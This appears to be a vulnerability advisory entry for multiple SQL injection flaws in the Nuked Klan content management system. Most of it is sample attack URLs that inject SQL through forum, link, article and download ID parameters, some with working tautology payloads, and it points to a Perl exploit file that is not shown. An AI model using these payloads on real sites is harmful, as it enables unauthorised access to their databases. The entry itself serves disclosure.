• info
• discussion
• exploit
• solution
• references

Nuked Klan Multiple SQL Injection Vulnerabilities

No exploit is required.

URI samples have been provided:
http://www.example.com/index.php?file=Forum&page=viewtopic&forum_id=[FORUM_ID]' OR id LIKE '%%' /*&thread_id=[THREAD_ID]' AND auteur_id LIKE '%%' /*
http://www.example.com/index.php?file=Forum&page=viewtopic&forum_id=1' OR id LIKE '%%'&thread_id=1' AND auteur_id LIKE '%%' /*
http://www.example.com/nk/index.php?file=Forum&page=viewtopic&forum_id='[SQL]&thread_id='[SQL]
http://www.example.com/nk/index.php?file=Links&op=description&link_id='[SQL]
http://www.example.com/nk/index.php?file=Sections&op=article&artid='[SQL]
http://www.example.com/nk/index.php?file=Download&op=description&dl_id='[SQL]

Sample exploit code is also available:

• /data/vulnerabilities/exploits/nk_1.7.exploit.pl